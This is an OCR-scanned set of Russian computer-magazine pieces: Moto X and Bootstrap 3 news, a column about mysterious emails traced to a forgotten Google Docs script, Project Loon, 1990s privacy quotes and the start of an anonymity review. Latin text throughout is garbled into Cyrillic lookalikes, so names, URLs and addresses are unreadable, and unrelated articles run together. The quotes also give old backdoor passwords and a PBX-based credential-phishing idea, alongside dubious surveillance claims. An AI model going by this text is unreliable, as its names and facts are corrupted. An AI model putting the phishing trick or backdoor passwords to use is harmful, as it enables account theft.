Технические характеристики новинки нельзя назвать рево- 
люционными и запредельными, все довольно обычно: дисплей 
4,7" с разрешением 720р, двухъядерный процессор Моіогоіа 
Х8 (1 ,7 ГГц), четырехъядерный Абгепо 320 СРЫ и два специали- 
зированных процессора І_-І\ІІ_Р и ССР, которые обеспечивают 
обработку данных, поступающих с датчиков и аудиосенсоров. 
Плюс 2 Гб ОЗУ и 16 или 32 Гб флеш-памяти. Казалось бы, все 
традиционно, но в этот раз Моіогоіа сделала ставку на персо- 
нификацию, а не на количество ядер. Дело в том, что на смарт- 
фон можно установить множество сменных панелей различной 
текстуры и цвета, сделать на корпусе гравировку «из коробки», 
подобрать в цвет наушники и даже зарядное устройство. На За- 
паде цена новинки составит 575 и 629 долларов для моделей 
с 16 и 32 Гб флеш-памяти соответственно. 



Помимо прочего, 

Моіо X может по- 
хвастаться голосовым 
управлением. После 
фразы «Ок, Соодіе 
Ыоѵѵ» аппарат готов 
распознавать и вы- 
полнять любые другие 
голосовые команды 
владельца. Другие дат- 
чики реагируют на дви- 
жение, к примеру, при 
покачивании смартфон 
включает камеру. 
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БЫСТРЕЕ, 

ВЫШЕ, СИЛЬНЕЕ 

ГЛАВНЫЕ НОВШЕСТВА ВООТ$ТВАР 3 



В конце июля в официальном блоге разработчиков Вооізігар ( Ыоа.аеіЬооізІтар. 

сот ) появилась информация о выходе третьей версии этого популярнейше- 
го адаптивного СЗЗ-фреймворка. Строго говоря, это не финальная версия, 
а всего-навсего релиз- кандидат. 

Ключевым изменением нового Вооізігар стал, конечно же, полностью об- 
новленный внешний вид. Разработчики отказались от градиентных тактильных стилей 
в пользу более современного «плоского» дизайна. Элементы управления стали более 
легковесными, в особенности это заметно на кнопках и паѵЬаг, самом узнаваемом эле- 
менте Вооізігар — черной навигационной панели в верхней части страницы. Визуальные 
элементы, привязанные к текстовым полям, также стали монотонными, а для типографи- 
ки появилось несколько новых Іідіііѵѵеідііі-классов. В целом ВС1 выглядит свежо и совре- 
менно, но для тех, кто привык видеть Вооізігар совершенно другим, поначалу может быть 
очень неожиданно. 

Под капотом у нового Вооізігар тоже много нового. Во-первых, Вооізігар больше 
не поддерживает ІЕ 7 и РР 3.6. Девелоперы убрали из кода фреймворка множество хаков 
и специфических префиксов, которые были необходимы для корректного отображения 
страниц в этих «старичках», благодаря чему код стал значительно чище. Во-вторых, при- 
оритет разработчиков заметно сместился в сторону тоЫІе Іігзі. В свете этого был осно- 
вательно переписан главный структурный элемент Вооізігар — сетка. Вместо привычных 
зрап’ов теперь есть два класса «ячеек» — .соі-* для смартфонов, .соі-зпл-* — для план- 
шетов. Соответственно, новый «бутстрэп» уже несовместим с более старыми версиями 
ветки 2.x, и миграция простой подменой С88- и 35-файлов больше невозможна. Кста- 
ти, проект обзавелся собственной бесплатной СЭІЧ, так что теперь подключать файлы 
фреймворка можно просто, и при этом не возникнет дополнительных задержек. 

Проще стало создавать и сложные группы контролов. Например, раньше для созда- 
ния сложных кастомных форм требовалось проявить недюжинное терпение, разобраться 
в хитросплетениях стилей и вложенных контейнеров, а иногда приходилось заглядывать 
в исходный код самих страниц документации. В версии 3.x структура верстки значительно 
упростилась, избавилась от лишних элементов и стала намного логичнее. 



Вооізігар 3 

ЗІеек, іпіиіііѵе, апсі роѵѵегГиІ тоЬіІе-'Гігзі ^гопі-епсі Ігаплеѵѵогк 
Йэг 'Газіег апсі еазіег ѵѵеЬ сіеѵеіортепі. 

Неайб ир! ііпііі Иіе ТіпаІ ѵЗ із геіеазей, йоѵтіоасіз тау Ье Ьеііігкі ІИе йеѵеіортепі ЬгапсП апсі Вошег раскаде. 



Роѵѵпіоагі Вооізігар 



І-ооктд Гог Вооізігар 2.3.2 йосз? ѴѴе’ѵе тоѵесі іі Іо а пеѵѵ Йоте ѵѵПіІе ѵѵе ризИ ГоплгагО ѵѵіІГі Вооізігар 3. КеаО ІПе Ыод Гог Оеіаііз 




СіІНиЬ рго]есІ Ехатріез ѲІурИісопз Вооізігар Ехро 



Обновленный дизайн главной страницы Вооізігар как бы говорит нам, что сайтов в Меіго- 
стиле теперь будет много. Очень много. Интересно, сколько продержится этот тренд? И когда 
Місгозоіі придумает новое название этой стилистики, взамен запрещенной? 




ОТОБРАЛИ 
УМОШЕННИКОВ 
И ОТДАЛ И ЛЮД ЯМ 

— > В июне текущего года американские власти кон- 
фисковали 46 подозрительных доменов, что является 
обычной практикой на Западе. Вот только регистрация 
всех доменов истекла месяц спустя, а продлить ее 
федералы забыли. В итоге домены вернулись в об- 
ращение как ни в чем не бывало. 




30-СКАНЕР В ПАРУ 
30-ПРИНТЕРУ 



— На Кіскзіагіег за сутки собрал финансирование 
проект по созданию бюджетного ручного ЗО-сканера. 
РиеІЗО будет стоить всего 990 долларов (сейчас по- 
добные устройства обходятся в несколько тысяч дол- 
ларов). Работает девайс как обычный фотоаппарат, 
только он сканирует объект, а не фотографирует. 



°3 




300 ГБ НАОДНОМ ДИСКЕ 



— > Компании Зопу и Рапазопіс решили отложить 
разногласия и объединиться ради создания ново- 
го формата оптических дисков. К 2015 году должна 
увидеть свет первая версия диска емкостью до 300 
Гб. Увы, уже известно, что диски будут несовместимы 
с устройствами чтения СЭ, ЭѴЭ и ВІи-гау. 




НеасГег 
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ПАРАНОИК? НЕТ! 
КАЖЕТСЯ, НЕТ 

Паранойей я, в общем-то, не страдаю. Когда нечего скрывать, не так уж 
сильно и запариваешься, что кто-то может читать твою почту или получить 
пароль к твоему ящику. Никакой папки іор зесгеі: никто там не найдет — ее 
там просто нет. Однако недавно случилась забавная история, которая все 
же заставила заиграть нотки паранойи и у меня. 




КОЛОНКА 

СТЁПЫ 

ИЛЬИНА 



СТРАННАЯ АКТИВНОСТЬ В ЯЩИКЕ 

Все началось с того, что я полез в папку с исходя- 
щими письмами, чтобы найти там какой-то мейл. 
И увидел там то, чего никто из нас увидеть бы не хо- 
тел: письма, которые я не отправлял! Это не могло 
быть ошибкой: два письма были отправлены бук- 
вально только что и два точно таких же днем ранее. 

Все дела тут же были отложены в сторону, 
и голова быстро загрузилась одним-единствен- 
ным вопросом: что за фигня? (Новый закон 
о СМИ запрещает нам использовать более жест- 
кие формулировки этого вопроса, хотя тут они 
могли бы быть уместны.) 

РАССУДИТЕЛЬНОСТЬ 

Надо сказать, что письма были очень странными 
и даже бессмысленными. Это совершенно точ- 
но не был спам. И не какие-то личные данные. 
Это вообще не было похоже ни на что, кроме 
как на сообщение от системы мониторинга. 

В заголовке было указано «ѴѴеЬзііе сіоѵѵп», а в 
теле письма фигурировал адрес ННр://сІѵсІ. хакер, 
ш (это часть сайта, посвященная ЭѴЭ-диску жур- 
нала) с подписью «Непредвиденная ошибка». 
Но я не помню, чтобы настраивал мониторинг. 
Тем более с отправкой уведомлений на адрес 
тдикізЬх@зІіагкІазег5.сопл. Пикантности добавля- 
ло то, что этот сервис используется для создания 
временных етаіГов, и я его точно видел впервые. 

Я посмотрел хедеры одного из писем, где 
явно было указано, что письмо отправлялось 
через ЗМТР. На всякий случай я отправил мейл 
через веб-морду СтаіГа и убедился, что хедеры 
в этом случае подставляются другие. Значит, до- 
ступ был получен не ко всему аккаунту, а, скорее 
всего, к одному из паролей приложений (в случае, 
когда включена двухфакторная авторизация, не- 
обходимо создавать статические пароли, чтобы 
использовать их в приложениях, которые двух- 
факторную авторизацию не поддерживают, — 
например в почтовых клиентах). Быстрое реше- 
ние — отозвать все пароли приложений. Изменил 
я и обычный пароль — ну так, на всякий случай. 

Я практически сразу открыл лог активностей, 
в котором фиксируются все обращения к аккаун- 
ту (в том числе для отправки почты по ЗМТР). Ни- 
каких подозрительных ІР-адресов не было. Это, 
с одной стороны, радовало — значит, с других 
машин обращений не было. Но, с другой сторо- 
ны, пугало — значит, используется одно из моих 
устройств? Но какое?! Я пошел спать. 

НЕПОНИМАНИЕ 

Сложно описать словами удивление, когда 
на следующее утро я увидел те же самые письма. 



И это после того, как были сменены все пароли. 
Задача явно становится интереснее. Кажется, 
единственный вариант в том, что одно из моих 
устройств заражено. Но в это верилось слабо: 

1. В последнее время я работаю только 
на Мае и после смены паролей нигде, кроме 
как на своем ноутбуке, пассы не вводил. Не- 
ужели заражена 08 X? Тут я впервые в жизни 
поставил на мак антивирус, который, есте- 
ственно, ничего не нашел, но зато сделал что- 
то ужасное с системой, из-за чего ее потом 
пришлось переустановить. 

2. Ранее я отозвал все пароли приложений, а, 
судя по хедерам, письма все равно отправля- 
лись через ЗМТР. Но без пароля приложения 
это невозможно! 

3. В списке активностей не было записей на вре- 
мя отправки сообщений. ѴѴТР? 

ПОЧТИ ПАНИКА 

К этому времени я уже успел отправить задачку 
многочисленным друзьям из сферы ИБ и рабо- 
тающим в Соодіе (кстати, выяснилось, что у СтаіІ 
нет никакой возможности написать или позвонить 
в суппорт), но никакого сколько-нибудь вразуми- 
тельного объяснения не было. 

Я решил сделать еще один эксперимент: 
на защищенном канале (мало ли кто снифает 
ѴѴі-Рі — выше я писал, что не страдаю параной- 
ей, — видимо, я соврал), а именно ЗС оператора, 
и с 99,99% незараженного устройства (взял іРасі 
Міпі) я еще раз поменял пароль. Вышел из систе- 
мы и больше пароль не вводил. 

ЭТО НЕВОЗМОЖНО! 

Надо ли говорить, что я увидел в ящике поутру? 
Черт подери, там были те же самые письма, 
отправленные от моего имени! Это уже было 
не смешно. Я не входил в аккаунт, и это объек- 
тивно не мог сделать кто-то другой. Что проис- 
ходит? 

К этому моменту я был на 100% убежден, 
что проблема не во мне. И не в моих девайсах. 
Как мне казалось, это был явный глюк Соодіе, 
который никто не мог объяснить. При этом до- 
браться непосредственно до суппорта гугла так 



и не получалось, хотя ответы (вернее, банальные 
рекомендации) пытались дать разные инженеры 
компании. Что бы ты делал на моем месте? У тебя 
есть догадки? 

РАЗГАДКА 

Когда руки уже опустились, я решил еще раз трез- 
во на все посмотреть. Все же на глюк это похоже 
не было. Письма явно относятся к бѵсі. хакер. ш, 
то есть имеют связь со мной — это не может быть 
совпадением. И я не исключал, что когда-то дей- 
ствительно настраивал мониторинг. 

И тут меня осенило. Я зациклился на почте, но, 
возможно, дело в каком-то другом сервисе гугла? 
Я когда-то делал мониторинг сайтов на Соодіе 
Арр Епдіпе, а еще... В этот момент я открыл 
Соодіе Эосз и вбил там злополучный адрес, на ко- 
торый уходили письма, — тдикізЬх@зІіагкІазег5. 
сот. Ответ сервера сразу поставил все на свои 
места. Я все вспомнил! 

Соодіе Эосз нашел документ «Копия Із Му Зііе 
Эоѵѵп — Эідііаі Іпзрігаііоп». Когда-то очень давно 
я игрался со скриптовым движком таблиц Соодіе 
Эосз (что-то вроде ѴВА в ЕхсеГе) и пробовал де- 
лать разные интересные вещи — кажется, у нас 
даже был на эту тему Ргооі'-о^-сопсері:. Тогда 
я наткнулся на статью о том, как реализовать 
мониторинг веб-сервера только на Соодіе Эосз 
( ЬіШ/НУОсІіи ). и сделал копию предложенного 
скрипта. Скрипт использовал функцию для по- 
лучения страницы (ШРеісНАрр) и функцию 
для отправки сообщения (МаіІАрр.зепсІЕплаіІ). 
Причем адрес сервера я поправил (на бѵсі. 
хакер. ш), а адрес получателя оставил авторский. 
Скрипт почему-то засбоил и начал каждую ночь 
отправлять алерты, которые чуть не свели меня 
с ума :). 

Оказалось, что это никакой не глюк, не АРТ 
и не заговор, а банальный склероз, помножен- 
ный на паранойю. Я забыл про свой же скрипт. 

Р. 3. И все-таки задачка получилась интересной. 
А ситуация все равно вызывает вопросы. Какой- 
то скрипт может слать сообщения от твоего име- 
ни, и это никак не отображается в логе активно- 
сти. Почему? Получается идеальный механизм 
для скрытной отправ- 
ки сообщений, если 
есть доступ к Соодіе- 
аккаунту. И ведь 
наверняка можно 
сделать управление 
рассылкой — через 
те же самые скрипты 
Соодіе Эосз! НЕ 



5Іерап.іІуіп@дтаіІ.сот 

Іо тдыкізЬх 0 



Ехсерііоп: Непредвиденная ошибка: Ыіо:І/дѵд. хакер. т/ 

Что за фигня? 
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Ргоо?-о?-Сопсері 

ИНТЕРНЕТ ЧЕРЕЗ ВОЗДУШНЫЕ ШАРЫ 




ЧТО ЭТО ТАКОЕ 

В июне 2013 года компания Соодіе официально 
анонсировала проект І_ооп ( аооаіе.сот/іооп ). ко- 
торый придуман в научно-исследовательской ла- 
боратории Соодіе X. 

В рамках проекта Ьооп планируется запустить 
множество воздушных шаров на солнечных бата- 
реях курсировать в стратосферных ветрах на вы- 
соте 20 км. Ветры на такой высоте постоянные, 
устойчивые и часто дуют в направлении вдоль 
экватора, так что шары должны вращаться во- 
круг планеты на одной параллели со скоростью 
8-30 км/ч. За счет большого количества шаров 
можно обеспечить сплошное покрытие земной 
территории на конкретной параллели. 

Сами шары относительно дешевы, так 
что у Соодіе не должно возникнуть проблем под- 
нять в небо нужное количество и заменять их пе- 
риодически. Конструкция сделана с таким расче- 
том, что каждый шар сможет непрерывно работать 
более 100 дней, хотя первые опыты показывают 
меньший срок службы. На высоте 20 км нет ни дож- 
дей, ни самолетов, так что единственной пробле- 
мой для шаров видится непредсказуемый ветер. 

ЗАЧЕМ ЭТО НУЖНО 

До сих пор две три населения земного шара 
не имеют доступа в интернет. Оптоволокно дорого 
и невыгодно тянуть в труднодоступные и малоза- 
селенные районы. Компания Соодіе предлагает 
решить эту проблему. Пропускной способности 
каналов должно хватить, чтобы обеспечить ско- 
рость доступа, сравнимую с ЗС. 

Организованные в единую коммуникационную 
сеть шары Соодіе обеспечат связь на обширных 
территориях по всему миру, в том числе во время 
стихийных бедствий. Каждый шар покрывает зону 
суши диаметром 40 км. 

КАК ЭТО РАБОТАЕТ 

Каждый аппарат состоит из «конверта» (15-ме- 
тровой полиэтиленовой оболочки, наполняемой 





Рис. 1 . Схема конструкции летательного 
аппарата с оборудованием 



Рис. 2. Полезная нагрузка аппарата: коммуникаци- 
онный модуль (справа), контроллер высоты (в цен- 
тре) и отсекдля электроники (слева) 



гелием) с парашютом для контролируемого спу- 
ска, солнечных батарей площадью в несколько 
квадратных метров и коробки с оборудованием 
весом около 10 кг (рис. 1). В коробке находятся 
аккумуляторы, электроника и радиопередатчики 
для связи с соседними шарами и с абонентами 
на земле. Аккумуляторы накапливают энергию 
днем, чтобы ее хватало на работу оборудованию 
ночью. При хорошем солнце панели обеспечива- 
ют ток 100 Вт. 

Радиопередатчики шаров работают на нели- 
цензируемых «научных» частотах ІЗМ, в диапазо- 
нах 2,4 ГГц и 5,8 ГГц. Для связи с ними использу- 
ются самодельные модемы в виде красных сфер 
(рис. 3). Частоты совпадают с частотами стандарт- 
ного ѴѴі-Рі, но сигналы можно отфильтровать. 

На первом этапе эксперимента около 30 шаров 
успешно вывели в стратосферу на 40-й параллели 



в южном полушарии. Разработанные компьютер- 
ные алгоритмы позволяют предсказывать, в ка- 
кой зоне следует добавить шар для обеспечения 
сплошного покрытия, и его запускают с таким 
расчетом, чтобы ветер вывел шар именно в задан- 
ную точку. Для этого требуется найти поток ветра 
нужного направления и скорости. Из центра управ- 
ления полетами следят за координатами каждого 
шара и при необходимости изменяют его высоту. 
Зная скорость и направление ветра на каждой вы- 
соте, можно маневрировать. 

В первом эксперименте для тестирования 
радиосвязи приняли участие около полусотни до- 
бровольцев. В будущем Соодіе собирается про- 
должить эксперимент. На той же 40-й параллели 
будет запущено до 300 шаров, все вместе они 
обеспечат связь для абонентов в Новой Зеландии, 
Австралии, Чили и Аргентине. ІНІ 






Рис. 3. Модем для выхода в интернет через воздушные шары Соодіе Рис. 4. Блок с фотоэлементами для питания электроники , 

І-ооп установлен на крыше дома одного из участников эксперимента которая прикреплена с обратной стороны 



Рис. 5. Шар поднимается 
в воздух 





СОѴЕЙ8ТОПѴ 
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ДВАДЦАТЬ ЛЕТ 
ПАРАНОЙИ • - 



За последние 15 лет люди очень легко привыкли 
к вниманию Большого Брата и его маленьких по- 
мощников — к глазкам телекамер, которые следят 
за ними из каждой подворотни, к биометриче- 
ской аутентификации, к открыванию сумок перед 
лицом охранника в кинотеатрах и прочих при- 
сутственных местах, к раздеванию в аэропортах 
и к компьютерным играм, которые не запускаются 
без постоянного доступа в интернет. Эти же люди, 
читая новости про Сноудена, искренне удивля- 
ются, они возмущаются, они не могут в это 
поверить! Каждая утечка, каждый перехват, 
каждое использование личной информа 
ции в чужих корыстных целях их удив- 
ляет — они от души охают, смотря 
новости по телевизору или читая их 
в Сети. Странная амбивалентность! 

Может быть, это что-то новень- 
кое? Когда появилась потреб- 
ность в сохранении своей ргіѵасу, 
в криптографии, в анонимности, 
в защите своего права на сво- 
бодное получение информации? 

Мы в прошлом. Шикарный 
Репйипл 166 МГц с 16 Мб ОЗУ. 

Такой есть не у каждого, это но- 
винка! К сожалению, на нем нет 
СЭ-ПОМ и звуковой карточки — 

ЗоипсІ ВІазІег 16 стоит недеше- 
во. Зато у нас есть модем на 33,6 
кбод — окно в мир РТЫ -сетей, ВВЗ’ок 
и такого молодого и недешевого ин- 
тернета. Запустим Іпіегпеі Ехріогег 4.0 
и посмотрим, что говорят люди... 

1998 ГОД 

«А чтобы действительно тебя никогда не зало- 
вили хоть на 10 тысяч долларов, надо выходить 
не со своего телефона, а с АТС или телефон- 
ного аппарата. Не знаю, как в других странах, 
но в Эстонии у некоторых телефонных аппаратов 
сверху прямо видны телефонные линии.» 

«В первую очередь надо не показывать свой 
ІР-адрес, а если уж показывать, то неверный. Есть 
много предложенных способов, но пока я не ви- 
дел ни одного, чтобы он действительно работал.» 

1 994 ГОД (ИЗ ЭЛЕКТРОННОГО ЖУРНАЛА 
ШРЕСТЕО ѴОІСЕ, ПОСВЯЩЕННОГО КОМ- 
ПЬЮТЕРНЫМ ВИРУСАМ) 

«Почтовый адрес: КИЕВ-148, а/я 10 «ЗіеаШі» 
(абонентский ящик тогда считался вполне адек- 
ватной защитой, никому и в голову не приходи- 
ло, что правоохранительные органы могут за- 
няться вирусным журналом. — Прим, ред.).» 

1997 ГОД (ИЗ ЭЛЕКТРОННОГО ЖУРНАЛА 
ШРЕСТЕО ѴОІСЕ, ПОСВЯЩЕННОГО КОМ- 
ПЬЮТЕРНЫМ ВИРУСАМ) 

«У Клуба появился свой етаіі-адрес, так что те- 
перь Вы имеете возможность писать нам по 



ВРЕМЯ ДЕЙСТВИЯ 

Все цитаты относятся к периоду 
1995-1998 годов. 




ІпІегпеГу. Письма лучше всего шифровать РСР. 
Если у Вас нет пакета РСР и Вы имеете жела- 
ние написать нам, сообщите нам об этой почтой 
или етаіГом, и мы вышлем Вам этот пакет. Да, 
и еще — люди, когда вы получаете наши бандеро- 
ли, не обращайте внимание на фамилию и имя от- 
правителя, какими бы они ни были, и уж тем более 
не указывайте эти фамилии при написании на а/я 
10. (Хорошим тоном для параноика тех времен 
считалась переписка с помощью РСР, единствен- 
но верной версии — 2.6.І Тог ЭОЗ с длиной ключа 
не менее 1024 бит (тогда это считалось хорошей 
длиной ключа). РСР вообще нравился паранои- 
кам того времени — им импонировало, что его 
запрещали к экспорту из США, а у Циммермана 
бывали проблемы с правительством. И это 1997 
год! Многие ли сейчас используют асимметрич- 
ное шифрование при переписке? — Прим, ред.)» 

«Заметайте следы. Подозреваете, что кто-то 
следит за вами? Хотите бродить по Сети инког- 



нито? Это можно сделать, если начать путеше- 
ствие с ѵѵѵѵѵѵ.іргоху.сопл — бесплатной службы, 
которая удаляет ваш сетевой адрес из соокіе- 
счетчиков и файлов доступа других серверов.» 

«Интересуетесь, не заведено ли на вас до- 
сье? Сайт РесІѴѴогІсІ ІпТогтаІіоп ІЧеІѵѵогк ( ѵѵѵѵѵѵ. 
іесіѵуогісі.аоѵ ) поможет вам найти информацию 
любого рода, включая предлагаемые для прода- 
жи правительственные документы.» 

ЭЛИНОР МИЛЗ, 1 997 ГОД 

«Введите правило использования паролей 
доступа к файлам, содержащим секрет- 
ную или ответственную информацию.» 

ПЯТНИЦА, 1 1 СЕНТЯБРЯ 
1 998^ГАЗЕТА «МОСКОВ- 
СКИЙ КОМСОМОЛЕЦ» 

«Сын известного московского 
композитора, музыкального тео- 
ретика, автора обработки «Вре- 
мен года» Чайковского для ка- 
мерного оркестра, 21 -летний 
Илья Гэбман [ІЧе^зегрЫТ //ПІІС] 
был задержан во вторник вме- 
сте со своими друзьями за хи- 
щение 20 тысяч долларов сра- 
зу из нескольких американских 
виртуальных магазинов через 
Интернет.» 

«Найти какой-нибудь левый 
прокси для ѵѵѵѵѵѵ достаточно легко, 
подобный сервис для ІВС, ІСО и иже 
с ними встречается, мягко говоря, очень 
редко и для простого біаіир-пользователя 
практически недоступен. Именно поэтому 
большая часть средств для атаки по ІР заточена 
под всевозможные I ВС-клиенты.» 

«Оговорюсь, что мы будем исходить из пред- 
положения, что имя домена или ІР-адрес пользо- 
вателя в ІРС подделать очень сложно и подавля- 
ющее большинство людей этим не занимаются, 
хотя такие методы и есть. На ум приходят два ме- 
тода: ІР зрооТіпд и использование специального 
прокси-сервера, способного поддерживать ІВС- 
протокол. Техника, называемая ІР зроо^іпд (об- 
ман ІР), весьма сложна в применении. Хакерские 
сайты предлагают пользователям ѴѴіпсІоѵѵз 
95 с версией ѴѴіпзоск 2.0 и выше несколько 
программ для подобных проделок.» 

«МісгозоТІ: ОиИоок Ехргезз 4.0 — все письма, 
которые вы когда-либо отправляли, получали 
или удаляли, он все равно хранит в своей базе. 
Поэтому периодически рекомендуем удалять 
(лучше невосстановимыми методами, например 
с помощью программы Кгеплііп 2.1) эти файлы. 

Существует мнение, что такие программы, 
как, например, операционная система ѴѴіп- 
сІоѵѵз, способны как бы следить за всем, 
что происходит в компьютере (либо сами, либо 
по команде из Интернета), и отправлять все 
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собранные данные своим разработчикам (кто-то 
сказал Соодіе СНгопле, СІіготе 05? Кто сказал, 
кто подумал? — Прим, ред.).» 

«Недавно был скандал, когда один извест- 
ный РТР-клиент отправлял все вводимые имена 
и пароли своим разработчикам. Так что будьте 
бдительны! 

Полностью защищенный компьютер — это 
тот, который стоит под замком в бронированной 
комнате в сейфе, не подключен ни к какой сети 
(даже электрической) и выключен. 

Практически все ПО, экспортируемое 
из США (включая ПО для шифрования), имеет 
так называемые «люки» или «черные ходы». 

Работает глобальная система прослушивания 
телефонных разговоров — СОРМ. Подробнее см. 
раздел о телефонии. Практически все микросхемы 
и электронные компоненты, производимые 
в США и других западных странах, способны «вы- 
ходить из строя» по команде со спутника, а так- 
же передавать нужную информацию на спутник. 
Практически вся военная техника может быть вы- 
ведена из строя командой со спутника.» 

1996 ГОД 

«Компании обязаны обеспечить спец- 
службам возможность контроля любых 
передаваемых данных, в частности — 
сообщений, посылаемых по эле- 
ктронной почте. Так же как и в слу- 
чае с сотовыми и пейджинговыми 
фирмами (см. «ДП» № 43/96), 
провайдеры обязаны за свой 
счет создать такие возмож- 
ности и предоставить Феде- 
ральной службе безопасности 
соответствующую аппа-ратуру 
для перехвата инфо-рмации. 

Ветаііег’ов в сети много, 
некоторые из них позволяют 
указывать фиктивный адрес 
отправителя, большинство же 
прямо указывают в заголовке, 
что сообщение анонимно. Вы 
можете воспользоваться римей- 
лером, послав сообщение по адресу 
гетаіІег@герІау.сот, указав Синеет 
гетаііег-ііеір. 

В любой аппаратуре сотовой связи 
на этапе разработки закладываются воз- 
можности: 

• представление информации о точном место- 
положении абонента (с точностью до метров); 

• запись и прослушивание разговоров; 

• фиксация номеров (даты, времени, категории 
и т. д.) вызывающей и принимающей вызов 
стороны; 

• дистанционное включение микрофона 

для прослушивания и т. д. 

Более того, в связи с тем что (для 
разведывательных целей) алгоритмы 

кодирования и защиты в сотовых системах 
связи намеренно ослаблены, они становят- 
ся ловкой добычей для разного рода хакеров 
и проходимцев. 

Далеко не все прокси-серверы являются 
полностью анонимными. Проверьте свой прокси 
на предмет его полной или неполной анонимно- 
сти: ННоѴМѵѵѵѵ.іатоз.сот/Ып/ргохѵ.саі . 

Если вы получите сообщение Ргоху зегѵег із 
сіеіесіесі! — ваш прокси имеет «дыру».» 

1997 ВѴМІКЕ8МІТН 

«Наверняка у вас в офисе есть мини-АТС. 
Перепрограммировать ее, чтобы звонки с дан- 



ного номера перероучивались на ваш, — плевое 
дело. Осталось только запустить терминальную 
программу ака ВВ5, в заставке указать заставку 
вашего провайдера ;). И юзер ведь купится! На 
100%. Введет и Іодіп, и раззѵѵогсі. 

ѴѴіпсІоѵѵз 98, на мой взгляд, имеет принципи- 
ально новую черту. Теперь каждая отдельная ко- 
пия этой операционной системы на каждом кон- 
кретном ПК в момент подключения к Интернет 
становится частью огромной единой глобальной 
операционной системы МісгозоТТ Самым без- 
обидным или даже незначительным побочным 
эффектом является автоматическое обновление 
(изменение?) внутренних частей ѴѴіпсІоѵѵз 98. 
А главным становится то, что в момент подклю- 
чения к Интернет фактически ВСЕ содержимое 
жесткого диска любого компьютера становится 
доступным Микрософт (ой вэй, так об этом нам 
говорили еще в прошлом веке! — Прим. ред.). 



БКСЬАМЕК 

Все цитаты, которые мы привели в этой 
статье, принадлежат их авторам. Иногда 
анонимным. Мнение авторов цитат мо- 
жет не совпадать ни с чем, кроме мнения 
авторов цитат, а их утверждения - быть 
порождением их души (быть может, 
больной). 



Новый Большой Брат (МісгозоТІ:) непрерыв- 
но круглосуточно сканирует содержимое жест- 
ких дисков десятков или даже сотен миллионов 
компьютеров по всему миру (и ваш домашний 
ПК тоже, если у вас установлена ѴѴіпсІоѵѵз 98) 
через Интернет, извлекает и скачивает инфор- 
мацию о версии операционной системы, об ап- 
паратуре (звуковой и видеокарте, модеме, жест- 
ком диске и т. д.) и программном обеспечении, 
установленном на ПК, анализирует и в случае не- 
обходимости автоматически через Интернет об- 
новляет части операционной системы, драйверы 
и другое программное обеспечение. 



Дело идет к тому, что на земле останется 
только ОДНА КОПИЯ одной глобальной сете- 
вой распределенной операционной системы 
ѴѴіпсІоѵѵз! Все компьютеры по сути превратятся 
в «сетевые компьютеры», их работа без подклю- 
чения к Интернет будет функционально сильно 
ограничена. Все жесткие диски всех компьюте- 
ров будут являться частью ОДНОЙ единой се- 
тевой распределенной файловой системы под 
управлением одной копии одной глобальной 
операционной системы ѴѴіпсІоѵѵз.» 

ПАВЕЛ СЕМЬЯНОВ, ЦЕНТРЗАЩИТЫ 
ИНФОРМАЦИИ СПБГТУ, 1 996 ГОД 

«Причины наличия люков в криптосистемах оче- 
видны: разработчик хочет иметь контроль над 
обрабатываемой в его системе информацией 
и оставляет для себя возможность расшифро- 
вывать ее, не зная ключа пользователя. Воз- 
можно также, что они используются для отладки 
и по какой-то причине не убираются из конечно- 
го продукта. Естественно, что это рано или позд- 
но становится известным достаточно большому 
кругу лиц и ценность такой криптосистемы ста- 
новится почти нулевой. Самыми известными 
примерами здесь являются АѴѴАРЮ ВІ05 
с его универсальным паролем «АѴѴАРЮ_ 
5ѴѴ» и СУБД Рагабох фирмы ВогІапсІ 
ІпіегпабопаІ, также имеющая «супер- 
пароли» «іІССАе» и «пхббррх». 

Вплотную к наличию люков в ре- 
ализации (очевидно, что в этом 
случае они используют явно не- 
стойкие алгоритмы или хранят 
ключ вместе с данными) примы- 
кают алгоритмы, дающие воз- 
можность третьему лицу читать 
зашифрованное сообщение, 
как это сделано в нашумевшем 
проекте СЫРРЕП, где третьим 
лицом выступает государство, 
всегда любящее совать нос 
в тайны своих граждан. 

Во многих книгах по без- 
опасности предлагается вы- 
бирать в качестве надежного 
пароля два осмысленных слова, 
разделенных некоторым знаком, на- 
пример «доосі! раззѵѵогсі». Подсчита- 
ем, за сколько времени в среднем будут 
сломаны такие пароли, если такое прави- 
ло включено в набор программы-взломщика 
(пусть словарь 10 000 слов, разделительными 
знаками могут быть 10 цифр и 32 знака препи- 
нания и специальных символа, машина класса 
Репбипл со скоростью 10 000 сгурі/с) := 210 000 
секунд, или всего 2,5 дня!» 

ДМИТРИЙ ЛЕОНОВ, ОТЕВ@НАСК2СШЕ.Пи 

«Нежно любимая миллионами пользовате- 
лей 100 ( НіФѴА/ѵѵѵѵѵ.іса.сот ) тоже оказалась 
не без греха. На странице Буосіог’з Ехріоіі ѵѵогіб 
помимо прочего приведена информация о сла- 
бостях ІСО’шного протокола, которые уже по- 
зволили создать многочисленные программы, 
делающие жизнь пользователя ІСО не слиш- 
ком пресной. Так, например, на странице ІСО 
Зпоо^ег Теапл предлагается опробовать про- 
грамму, позволяющую слать сообщения по ІСО 
с чужого III N. ЗпооТег существует в двух вариан- 
тах — в виде скрипта, доступного со страницы, 
и в виде программы, которую обещают рассы- 
лать по почте. Для его использования достаточ- 
но знать ІР-адрес адресата, номер порта, на ко- 
тором висит ІСО, и ІІІЫ отправителя. Инструкция 
прилагается.» НС 
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ОБЗОР СПОСОБОВ ОСТАВАТЬСЯ АНОНИМНЫМ В СЕТИ 



Так уж иногда случается, что фантастические и шпионские 
сюжеты оказываются не только плодом больной фантазии ав- 
тора, а самой настоящей правдой. Еще совсем недавно какой- 
нибудь параноидальный фильм о тотальной слежке государ- 
ства за человеком воспринимался как очередная сказка, игра 
воображения автора и сценаристов. До тех пор, пока Эдвард 
Сноуден не обнародовал информацию о РВІ5М — программе 
слежения за пользователями, принятой на вооружение Агент- 
ством национальной безопасности США. 



ПОВОД ДЛЯ БЕСПОКОЙСТВА 

После такой новости шутки про паранойю стали 
совсем не актуальны. А разговоры про слежку 
нельзя больше списать на расшатанную психику. 
Возникает серьезный вопрос, можно ли чувство- 
вать себя в безопасности, пользуясь своей почтой 
или общаясь в социальной сети или чате? Ведь 
на сотрудничество со спецслужбами пошли мно- 
гие крупные компании: МісгозоИ (НоДпаіІ), Соодіе 
(Соодіе МаіІ), Уаііоо!, РасеЬоок, ѴоиТиЬе, Зкуре, 
АОІ_, Арріе. Учитывая то, что РВІ8М была нацеле- 
на в первую очередь на слежку за иностранными 
гражданами, а объем перехватываемых телефон- 
